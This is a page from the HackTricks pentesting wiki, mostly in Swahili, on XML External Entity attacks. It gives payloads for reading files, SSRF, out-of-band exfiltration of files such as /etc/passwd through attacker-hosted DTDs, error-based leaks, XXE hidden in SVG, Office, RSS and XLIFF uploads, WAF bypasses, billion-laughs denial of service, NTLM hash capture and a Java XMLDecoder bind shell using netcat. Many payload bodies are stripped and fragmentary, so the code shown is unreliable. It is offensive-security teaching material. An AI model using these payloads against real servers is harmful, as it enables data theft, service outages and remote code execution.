# XXE - XEE - XML External Entity {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
{% embed url="https://websec.nl/" %} ## Msingi wa XML XML ni lugha ya alama iliyoundwa kwa ajili ya uhifadhi na usafirishaji wa data, ikiwa na muundo wa kubadilika unaoruhusu matumizi ya lebo zenye majina ya kuelezea. Inatofautiana na HTML kwa kutokuwa na mipaka ya lebo zilizowekwa awali. Umuhimu wa XML umepungua na kuongezeka kwa JSON, licha ya jukumu lake la awali katika teknolojia ya AJAX. * **Uwakilishi wa Data kupitia Vitu**: Vitu katika XML vinaruhusu uwakilishi wa data, ikiwa ni pamoja na wahusika maalum kama `<` na `>`, ambazo zinahusiana na `<` na `>` ili kuepuka mgongano na mfumo wa lebo za XML. * **Kufafanua Vipengele vya XML**: XML inaruhusu ufafanuzi wa aina za vipengele, ikielezea jinsi vipengele vinavyopaswa kuundwa na ni maudhui gani yanaweza kuwa nayo, kuanzia aina yoyote ya maudhui hadi vipengele maalum vya watoto. * **Ufafanuzi wa Aina ya Hati (DTD)**: DTD ni muhimu katika XML kwa kufafanua muundo wa hati na aina za data zinazoweza kuwa ndani yake. Zinaweza kuwa za ndani, za nje, au mchanganyiko, zikiongoza jinsi hati zinavyopangwa na kuthibitishwa. * **Vitu vya Kawaida na vya Nje**: XML inasaidia kuunda vitu vya kawaida ndani ya DTD kwa uwakilishi wa data wa kubadilika. Vitu vya nje, vilivyofafanuliwa kwa URL, vinainua wasiwasi wa usalama, hasa katika muktadha wa mashambulizi ya XML External Entity (XXE), ambayo yanatumia jinsi parser za XML zinavyoshughulikia vyanzo vya data vya nje: ` ]>` * **Ugunduzi wa XXE kwa kutumia Vitu vya Kigezo**: Kwa ajili ya kugundua udhaifu wa XXE, hasa wakati mbinu za kawaida zinashindwa kutokana na hatua za usalama za parser, vitu vya kigezo vya XML vinaweza kutumika. Vitu hivi vinaruhusu mbinu za kugundua nje ya mtandao, kama vile kuanzisha utafutaji wa DNS au maombi ya HTTP kwa kikoa kinachodhibitiwa, ili kuthibitisha udhaifu. * ` ]>` * ` ]>` ## Mashambulizi Makuu [**Mengi ya mashambulizi haya yalijaribiwa kwa kutumia maabara bora za Portswiggers XEE: https://portswigger.net/web-security/xxe**](https://portswigger.net/web-security/xxe) ### Jaribio la Kitu Kipya Katika shambulio hili nitajaribu kuona kama tamko rahisi la KITU kipya linafanya kazi. ```xml ]> &toreplace; 1 ``` ![](<../.gitbook/assets/image (870).png>) ### Soma faili Hebu jaribu kusoma `/etc/passwd` kwa njia tofauti. Kwa Windows unaweza kujaribu kusoma: `C:\windows\system32\drivers\etc\hosts` Katika kesi hii ya kwanza, angalia kwamba SYSTEM "_\*\*file:///\*\*etc/passwd_" pia itafanya kazi. ```xml ]> &example; ``` ![](<../.gitbook/assets/image (86).png>) Hali hii ya pili inapaswa kuwa na manufaa kutoa faili ikiwa seva ya wavuti inatumia PHP (Sio kesi ya maabara za Portswigger) ```xml ]> &example; ``` Katika kesi hii ya tatu, angalia tunatangaza `Element stockCheck` kama ANY ```xml ]> &file; 1 ``` ![](<../.gitbook/assets/image (753).png>) ### Orodha ya saraka Katika programu za **Java** inaweza kuwa inawezekana **kuorodhesha maudhui ya saraka** kupitia XXE kwa payload kama (kuuliza tu saraka badala ya faili): ```xml ]>&xxe; ]>&xxe; ``` ### SSRF XXE inaweza kutumika kuabudu SSRF ndani ya wingu ```xml ]> &xxe;1 ``` ### Blind SSRF Kwa kutumia **mbinu iliyotajwa hapo awali** unaweza kufanya seva kufikia seva unayodhibiti ili kuonyesha kuwa ina udhaifu. Lakini, ikiwa hiyo haitafanya kazi, huenda ni kwa sababu **vitu vya XML haviruhusiwi**, katika kesi hiyo unaweza kujaribu kutumia **vitu vya parameta za XML**: ```xml %xxe; ]> 3;1 ``` ### "Blind" SSRF - Exfiltrate data out-of-band **Katika tukio hili tutafanya seva ipakie DTD mpya yenye mzigo mbaya ambao utatuma maudhui ya faili kupitia ombi la HTTP (kwa faili zenye mistari mingi unaweza kujaribu kuhamasisha kupitia \_ftp://**\_ ukitumia seva hii ya msingi kwa mfano [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**). Maelezo haya yanategemea** [**Portswiggers lab hapa**](https://portswigger.net/web-security/xxe/blind)**.** Katika DTD mbaya iliyotolewa, hatua kadhaa zinafanywa ili kuhamasisha data: ### Mfano wa DTD Mbaya: Muundo ni kama ifuatavyo: ```xml "> %eval; %exfiltrate; ``` The steps executed by this DTD include: 1. **Definition of Parameter Entities:** * An XML parameter entity, `%file`, is created, reading the content of the `/etc/hostname` file. * Another XML parameter entity, `%eval`, is defined. It dynamically declares a new XML parameter entity, `%exfiltrate`. The `%exfiltrate` entity is set to make an HTTP request to the attacker's server, passing the content of the `%file` entity within the query string of the URL. 2. **Execution of Entities:** * The `%eval` entity is utilized, leading to the execution of the dynamic declaration of the `%exfiltrate` entity. * The `%exfiltrate` entity is then used, triggering an HTTP request to the specified URL with the file's contents. The attacker hosts this malicious DTD on a server under their control, typically at a URL like `http://web-attacker.com/malicious.dtd`. **XXE Payload:** Ili kutumia programu iliyo hatarini, mshambuliaji anatumia XXE payload: ```xml %xxe;]> 3;1 ``` This payload defines an XML parameter entity `%xxe` and incorporates it within the DTD. When processed by an XML parser, this payload fetches the external DTD from the attacker's server. The parser then interprets the DTD inline, executing the steps outlined in the malicious DTD and leading to the exfiltration of the `/etc/hostname` file to the attacker's server. ### Error Based(External DTD) **Katika kesi hii tutafanya server iandae DTD mbaya ambayo itaonyesha maudhui ya faili ndani ya ujumbe wa kosa (hii ni halali tu ikiwa unaweza kuona ujumbe wa kosa).** [**Mfano kutoka hapa.**](https://portswigger.net/web-security/xxe/blind) Ujumbe wa kosa la uchambuzi wa XML, ukifunua maudhui ya faili ya `/etc/passwd`, unaweza kuanzishwa kwa kutumia DTD mbaya ya nje. Hii inafanywa kupitia hatua zifuatazo: 1. Kituo cha XML kinachoitwa `file` kinafafanuliwa, ambacho kina maudhui ya faili ya `/etc/passwd`. 2. Kituo cha XML kinachoitwa `eval` kinafafanuliwa, kikijumuisha tangazo la dinamik kwa kituo kingine cha XML kinachoitwa `error`. Kituo hiki `error`, kinapojaribiwa, kinajaribu kupakia faili isiyopo, kikijumuisha maudhui ya kituo cha `file` kama jina lake. 3. Kituo cha `eval` kinaitwa, na kusababisha tangazo la dinamik la kituo cha `error`. 4. Kuitwa kwa kituo cha `error` kunasababisha jaribio la kupakia faili isiyopo, na kutoa ujumbe wa kosa ambao unajumuisha maudhui ya faili ya `/etc/passwd` kama sehemu ya jina la faili. DTD mbaya ya nje inaweza kuitwa kwa XML ifuatayo: ```xml %xxe;]> 3;1 ``` Upon execution, the web server's response should include an error message displaying the contents of the `/etc/passwd` file. ![](<../.gitbook/assets/image (809).png>) _**Tafadhali notice kwamba DTD ya nje inaturuhusu kujumuisha entiti moja ndani ya ya pili (****`eval`****), lakini inakatazwa katika DTD ya ndani. Hivyo, huwezi kulazimisha kosa bila kutumia DTD ya nje (kawaida).**_ ### **Kosa Kulingana na (system DTD)** Hivyo kuhusu udhaifu wa XXE kipofu wakati **mawasiliano ya nje yamezuiwa** (muunganisho wa nje haupo)? Kipengele katika spesifikesheni ya lugha ya XML kinaweza **kuweka wazi data nyeti kupitia ujumbe wa makosa wakati DTD ya hati inachanganya matangazo ya ndani na ya nje**. Tatizo hili linaruhusu upya wa ndani wa entiti zilizotangazwa kwa nje, na kuwezesha utekelezaji wa mashambulizi ya XXE yanayotegemea makosa. Mashambulizi kama haya yanatumia upya wa entiti ya parameter ya XML, ambayo awali ilitangazwa katika DTD ya nje, kutoka ndani ya DTD ya ndani. Wakati muunganisho wa nje unazuiwa na seva, washambuliaji wanapaswa kutegemea faili za DTD za ndani ili kufanya shambulizi, wakilenga kusababisha kosa la uchambuzi ili kufichua taarifa nyeti. Fikiria hali ambapo mfumo wa faili wa seva una faili ya DTD katika `/usr/local/app/schema.dtd`, ikifafanua entiti inayoitwa `custom_entity`. Mshambuliaji anaweza kusababisha kosa la uchambuzi wa XML linalofichua maudhui ya faili ya `/etc/passwd` kwa kuwasilisha DTD ya mseto kama ifuatavyo: ```xml "> %eval; %error; '> %local_dtd; ]> ``` The outlined steps are executed by this DTD: * Mwelekeo wa kituo cha XML kinachoitwa `local_dtd` unajumuisha faili ya DTD ya nje iliyoko kwenye mfumo wa faili wa seva. * Ufafanuzi mpya unafanyika kwa kituo cha XML `custom_entity`, ambacho kilifafanuliwa awali katika DTD ya nje, ili kufunika [kuvunjika kwa XXE kulingana na makosa](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages). Ufafanuzi huu mpya umeundwa ili kuleta kosa la uchambuzi, na kufichua maudhui ya faili ya `/etc/passwd`. * Kwa kutumia kituo cha `local_dtd`, DTD ya nje inahusishwa, ikijumuisha `custom_entity` iliyofafanuliwa upya. Mfululizo huu wa hatua unachochea utoaji wa ujumbe wa kosa unaokusudiwa na uvunjaji. **Real world example:** Mifumo inayotumia mazingira ya desktop ya GNOME mara nyingi huwa na DTD katika `/usr/share/yelp/dtd/docbookx.dtd` inayojumuisha kituo kinachoitwa `ISOamso` ```xml "> %eval; %error; '> %local_dtd; ]> 3;1 ``` ![](<../.gitbook/assets/image (625).png>) Kwa kuwa mbinu hii inatumia **internal DTD unahitaji kupata moja halali kwanza**. Unaweza kufanya hivi **kwa kufunga** ile ile **OS / Software** ambayo seva inatumia na **kutafuta baadhi ya DTD za kawaida**, au **kuchukua orodha** ya **DTD za kawaida** ndani ya mifumo na **kuangalia** kama yoyote yao ipo: ```xml %local_dtd; ]> ``` Kwa maelezo zaidi angalia [https://portswigger.net/web-security/xxe/blind](https://portswigger.net/web-security/xxe/blind) ### Kutafuta DTDs ndani ya mfumo Katika repo nzuri ya github ifuatayo unaweza kupata **njia za DTDs ambazo zinaweza kuwepo katika mfumo**: {% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %} Zaidi ya hayo, ikiwa una **picha ya Docker ya mfumo wa mwathirika**, unaweza kutumia chombo cha repo hiyo hiyo ili **kuchunguza** **picha** na **kupata** njia ya **DTDs** zilizopo ndani ya mfumo. Soma [Readme ya github](https://github.com/GoSecure/dtd-finder) kujifunza jinsi. ```bash java -jar dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar Scanning TAR file /tmp/dadocker.tar [=] Found a DTD: /tomcat/lib/jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd Testing 0 entities : [] [=] Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd Testing 0 entities : [] ``` ### XXE kupitia Office Open XML Parsers Kwa maelezo ya kina kuhusu shambulio hili, **angalia sehemu ya pili ya** [**hiki kipande cha ajabu**](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/) **kutoka Detectify**. Uwezo wa **kupakia hati za Microsoft Office unapatikana katika programu nyingi za wavuti**, ambazo kisha zinaendelea kutoa maelezo fulani kutoka kwa hati hizi. Kwa mfano, programu ya wavuti inaweza kuruhusu watumiaji kuingiza data kwa kupakia karatasi ya hesabu ya muundo wa XLSX. Ili parser iweze kutoa data kutoka kwa karatasi ya hesabu, itahitaji bila shaka kuchambua angalau faili moja ya XML. Ili kujaribu udhaifu huu, ni muhimu kuunda **faili ya Microsoft Office yenye mzigo wa XXE**. Hatua ya kwanza ni kuunda directory tupu ambayo hati inaweza kufunguliwa. Mara hati inapofunguliwa, faili ya XML iliyoko `./unzipped/word/document.xml` inapaswa kufunguliwa na kuhaririwa katika mhariri wa maandiko unaopendelea (kama vim). XML inapaswa kubadilishwa ili kujumuisha mzigo wa XXE unaotakiwa, mara nyingi ikianza na ombi la HTTP. Mistari ya XML iliyobadilishwa inapaswa kuingizwa kati ya vitu viwili vya mzizi wa XML. Ni muhimu kubadilisha URL kuwa URL inayoweza kufuatiliwa kwa maombi. Hatimaye, faili inaweza kufungwa ili kuunda faili ya hatari ya poc.docx. Kutoka kwenye directory "unzipped" iliyoundwa awali, amri ifuatayo inapaswa kutekelezwa: Sasa, faili iliyoundwa inaweza kupakiwa kwenye programu ya wavuti inayoweza kuwa na udhaifu, na mtu anaweza kutumaini ombi kuonekana katika kumbukumbu za Burp Collaborator. ### Jar: protokali Protokali ya **jar** inapatikana pekee ndani ya **programu za Java**. Imepangwa kuwezesha ufikiaji wa faili ndani ya **PKZIP** archive (mfano, `.zip`, `.jar`, nk), ikihudumia faili za ndani na za mbali. ``` jar:file:///var/myarchive.zip!/file.txt jar:https://download.host.com/myarchive.zip!/file.txt ``` {% hint style="danger" %} Ili kuweza kufikia faili ndani ya faili za PKZIP ni **faida kubwa kutumia XXE kupitia faili za DTD za mfumo.** Angalia [sehemu hii kujifunza jinsi ya kutumia faili za DTD za mfumo](xxe-xee-xml-external-entity.md#error-based-system-dtd). {% endhint %} Mchakato wa kufikia faili ndani ya archive ya PKZIP kupitia protokali ya jar unajumuisha hatua kadhaa: 1. Ombi la HTTP linafanywa kupakua archive ya zip kutoka eneo lililotajwa, kama vile `https://download.website.com/archive.zip`. 2. Jibu la HTTP linaloelezea archive linawekwa kwa muda kwenye mfumo, kawaida katika eneo kama `/tmp/...`. 3. Archive hiyo inachukuliwa ili kufikia maudhui yake. 4. Faili maalum ndani ya archive, `file.zip`, inasomwa. 5. Baada ya operesheni, faili zozote za muda zilizoundwa wakati wa mchakato huu zinafuta. Mbinu ya kuvutia ya kuingilia kati mchakato huu katika hatua ya pili inahusisha kuweka muunganisho wa seva wazi milele wakati wa kuhudumia faili ya archive. Zana zinazopatikana katika [hifadhi hii](https://github.com/GoSecure/xxe-workshop/tree/master/24\_write\_xxe/solution) zinaweza kutumika kwa kusudi hili, ikiwa ni pamoja na seva ya Python (`slow_http_server.py`) na seva ya Java (`slowserver.jar`). ```xml ]> &xxe; ``` {% hint style="danger" %} Kuandika faili katika saraka ya muda kunaweza kusaidia **kuongeza udhaifu mwingine unaohusisha usafiri wa njia** (kama vile kujumuisha faili za ndani, sindano ya templeti, XSLT RCE, deserialization, nk). {% endhint %} ### XSS ```xml script]]>alert(1)/script]]> ``` ### DoS #### Shambulio la Bilioni za Kicheko ```xml ]> &a4; ``` #### Yaml Attack ```xml a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` #### Quadratic Blowup Attack ![](<../.gitbook/assets/image (527).png>) #### Kupata NTML Katika mwenyeji wa Windows, inawezekana kupata hash ya NTML ya mtumiaji wa seva ya wavuti kwa kuweka handler ya responder.py: ```bash Responder.py -I eth0 -v ``` na kwa kutuma ombi lifuatalo ```xml ]> &example; ``` Then you can try to crack the hash using hashcat ## Hidden XXE Surfaces ### XInclude Wakati wa kuunganisha data za mteja katika hati za XML za upande wa seva, kama zile katika maombi ya SOAP ya nyuma, udhibiti wa moja kwa moja juu ya muundo wa XML mara nyingi ni mdogo, na kuzuia mashambulizi ya jadi ya XXE kutokana na vizuizi vya kubadilisha kipengele cha `DOCTYPE`. Hata hivyo, shambulizi la `XInclude` linatoa suluhisho kwa kuruhusu kuingizwa kwa vitu vya nje ndani ya kipengele chochote cha data katika hati ya XML. Njia hii ni bora hata wakati sehemu tu ya data ndani ya hati ya XML iliyozalishwa na seva inaweza kudhibitiwa. Ili kutekeleza shambulizi la `XInclude`, jina la eneo la `XInclude` lazima litangazwe, na njia ya faili ya kitu cha nje kinachokusudiwa lazima ibainishwe. Hapa chini kuna mfano mfupi wa jinsi shambulizi kama hilo linaweza kuandaliwa: ```xml productId=&storeId=1 ``` Check [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) for more info! ### SVG - File Upload Fail zilizopakiwa na watumiaji kwa programu fulani, ambazo kisha zinashughulikiwa kwenye seva, zinaweza kutumia udhaifu katika jinsi XML au muundo wa faili unaoshikilia XML unavyoshughulikiwa. Muundo wa faili wa kawaida kama hati za ofisi (DOCX) na picha (SVG) unategemea XML. Wakati watumiaji **wanapopakia picha**, picha hizi zinashughulikiwa au kuthibitishwa upande wa seva. Hata kwa programu zinazotarajia muundo kama PNG au JPEG, **maktaba ya usindikaji wa picha ya seva inaweza pia kusaidia picha za SVG**. SVG, ikiwa ni muundo unaotegemea XML, inaweza kutumiwa na washambuliaji kuwasilisha picha za SVG zenye uharibifu, hivyo kupelekea seva kuwa hatarini kwa udhaifu wa XXE (XML External Entity). Mfano wa udhaifu kama huo umeonyeshwa hapa chini, ambapo picha ya SVG yenye uharibifu inajaribu kusoma faili za mfumo: ```xml ``` Njia nyingine inahusisha kujaribu **kutekeleza amri** kupitia PHP "expect" wrapper: ```xml ``` Katika hali zote mbili, muundo wa SVG unatumika kuzindua mashambulizi yanayotumia uwezo wa usindikaji wa XML wa programu ya seva, ikionyesha hitaji la uthibitisho wa ingizo thabiti na hatua za usalama. Angalia [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) kwa maelezo zaidi! **Kumbuka kwamba mstari wa kwanza wa faili iliyosomwa au wa matokeo ya utekelezaji utaonekana NDANI ya picha iliyoundwa. Hivyo unahitaji kuwa na uwezo wa kufikia picha ambayo SVG imeunda.** ### **PDF - Upakiaji wa faili** Soma chapisho lifuatalo ili **ujifunze jinsi ya kutumia XXE kwa kupakia faili ya PDF**: {% content-ref url="file-upload/pdf-upload-xxe-and-cors-bypass.md" %} [pdf-upload-xxe-and-cors-bypass.md](file-upload/pdf-upload-xxe-and-cors-bypass.md) {% endcontent-ref %} ### Aina ya Maudhui: Kutoka x-www-urlencoded hadi XML Ikiwa ombi la POST linakubali data katika muundo wa XML, unaweza kujaribu kutumia XXE katika ombi hilo. Kwa mfano, ikiwa ombi la kawaida lina yafuatayo: ```xml POST /action HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 7 foo=bar ``` Kisha unaweza kuweza kuwasilisha ombi lifuatalo, na matokeo sawa: ```xml POST /action HTTP/1.0 Content-Type: text/xml Content-Length: 52 bar ``` ### Content-Type: Kutoka JSON hadi XEE Ili kubadilisha ombi unaweza kutumia Burp Extension inayoitwa “**Content Type Converter**“. [Hapa](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) unaweza kupata mfano huu: ```xml Content-Type: application/json;charset=UTF-8 {"root": {"root": { "firstName": "Avinash", "lastName": "", "country": "United States", "city": "ddd", "postalCode": "ddd" }}} ``` ```xml Content-Type: application/xml;charset=UTF-8 ]> &xxe; United States ddd ddd ``` Another example can be found [here](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2). ## WAF & Protections Bypasses ### Base64 ```xml %init; ]> ``` Hii inafanya kazi tu ikiwa seva ya XML inakubali itifaki ya `data://`. ### UTF-7 Unaweza kutumia \[**"Encode Recipe**" ya cyberchef hapa ]\(\[[https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28%27UTF-7%20%2865000%29%27%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) kubadilisha kuwa UTF-7. ```xml +ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4- ``` ```xml +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 ``` ### File:/ Protocol Bypass Ikiwa wavuti inatumia PHP, badala ya kutumia `file:/` unaweza kutumia **php wrappers**`php://filter/convert.base64-encode/resource=` ili **kupata faili za ndani**. Ikiwa wavuti inatumia Java unaweza kuangalia [**jar: protocol**](xxe-xee-xml-external-entity.md#jar-protocol). ### HTML Entities Hila kutoka [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\ Unaweza kuunda **entiti ndani ya entiti** kwa kuikodisha kwa **html entities** na kisha kuitumia ili **kupakia dtd**.\ Kumbuka kwamba **HTML Entities** zinazotumika zinahitaji kuwa **za nambari** (kama \[katika mfano huu]\([https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C)). ```xml %a;%dtd;]> &exfil; ``` Mfano wa DTD: ```xml "> %abt; %exfil; ``` ## PHP Wrappers ### Base64 **Toa** _**index.php**_ ```xml ]> ``` #### **Toa rasilimali za nje** ```xml ]> ``` ### Remote code execution **Ikiwa moduli ya PHP "expect" imepakiwa** ```xml ]> &xxe; mypass ``` ## **SOAP - XEE** ```xml %dtd;]>]]> ``` ## XLIFF - XXE Mfano huu umehamasishwa na [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe) XLIFF (XML Localization Interchange File Format) inatumika kuimarisha ubadilishanaji wa data katika mchakato wa uhamasishaji. Ni muundo wa XML unaotumika hasa kwa ajili ya kuhamasisha data inayoweza kubadilishwa kati ya zana wakati wa uhamasishaji na kama muundo wa kawaida wa kubadilishana kwa zana za CAT (Computer-Aided Translation). ### Blind Request Analysis Ombi linafanywa kwa seva na maudhui yafuatayo: ```xml ------WebKitFormBoundaryqBdAsEtYaBjTArl3 Content-Disposition: form-data; name="file"; filename="xxe.xliff" Content-Type: application/x-xliff+xml %remote; ]> ------WebKitFormBoundaryqBdAsEtYaBjTArl3-- ``` Hata hivyo, ombi hili linazua kosa la ndani la seva, hasa likitaja tatizo na matangazo ya alama: ```json {"status":500,"error":"Internal Server Error","message":"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."} ``` Ingawa kuna kosa, hit inarekodiwa kwenye Burp Collaborator, ikionyesha kiwango fulani cha mwingiliano na chombo cha nje. Out of Band Data Exfiltration Ili kuhamasisha data, ombi lililobadilishwa linatumwa: ``` ------WebKitFormBoundaryqBdAsEtYaBjTArl3 Content-Disposition: form-data; name="file"; filename="xxe.xliff" Content-Type: application/x-xliff+xml %remote; ]> ------WebKitFormBoundaryqBdAsEtYaBjTArl3-- ``` Hii mbinu inaonyesha kwamba User Agent inaonyesha matumizi ya Java 1.8. Kikwazo kilichotajwa na toleo hili la Java ni kutoweza kupata faili zinazokuwa na tabo mpya, kama vile /etc/passwd, kwa kutumia mbinu ya Out of Band. Data Exfiltration Inayotokana na Makosa Ili kushinda kikwazo hiki, mbinu inayotokana na makosa inatumika. Faili ya DTD imeundwa kama ifuatavyo ili kuanzisha kosa ambalo linajumuisha data kutoka kwa faili lengwa: ```xml "> %foo; %xxe; ``` Server inajibu kwa kosa, muhimu kuonyesha faili isiyopo, ikionyesha kwamba server inajaribu kufikia faili iliyoainishwa: ```javascript {"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"} ``` Ili kujumuisha maudhui ya faili katika ujumbe wa kosa, faili la DTD linarekebishwa: ```xml "> %foo; %xxe; ``` Hii mabadiliko husababisha uhamasishaji wa mafaili yaliyomo, kama inavyoonyeshwa katika matokeo ya kosa yaliyotumwa kupitia HTTP. Hii inaonyesha shambulio la XXE (XML External Entity) lililofanikiwa, likitumia mbinu za Out of Band na Error-Based ili kutoa taarifa nyeti. ## RSS - XEE XML halali yenye muundo wa RSS ili kutumia udhaifu wa XXE. ### Ping back Omba rahisi la HTTP kwa seva ya washambuliaji. ```xml /rssXXE" >]> XXE Test Blog http://example.com/ XXE Test Blog Mon, 02 Feb 2015 00:00:00 -0000 &xxe; http://example.com Test Post author@example.com Mon, 02 Feb 2015 00:00:00 -0000 ``` ### Soma faili ```xml ]> The Blog http://example.com/ A blog about things Mon, 03 Feb 2014 00:00:00 -0000 &xxe; http://example.com a post author@example.com Mon, 03 Feb 2014 00:00:00 -0000 ``` ### Soma msimbo wa chanzo Kutumia kichujio cha PHP base64 ```xml ]> The Blog http://example.com/ A blog about things Mon, 03 Feb 2014 00:00:00 -0000 &xxe; http://example.com a post author@example.com Mon, 03 Feb 2014 00:00:00 -0000 ``` ## Java XMLDecoder XEE to RCE XMLDecoder ni darasa la Java linalounda vitu kulingana na ujumbe wa XML. Ikiwa mtumiaji mbaya anaweza kufanya programu kutumia data isiyo na mpangilio katika wito wa njia **readObject**, atapata mara moja utekelezaji wa msimbo kwenye seva. ### Using Runtime().exec() ```xml /usr/bin/nc -l -p 9999 -e /bin/sh ``` ### ProcessBuilder ```xml /usr/bin/nc -l -p 9999 -e /bin/sh ``` ## Tools {% embed url="https://github.com/luisfontes19/xxexploiter" %} ## References * [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)\\ * [https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html)\\ * Pata info kupitia HTTP ukitumia DTD yako ya nje: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\\ * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection)\\ * [https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4)\\ * [https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9)\\ * [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)\\ * [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)
{% embed url="https://websec.nl/" %} {% hint style="success" %} Jifunze & fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Jifunze & fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
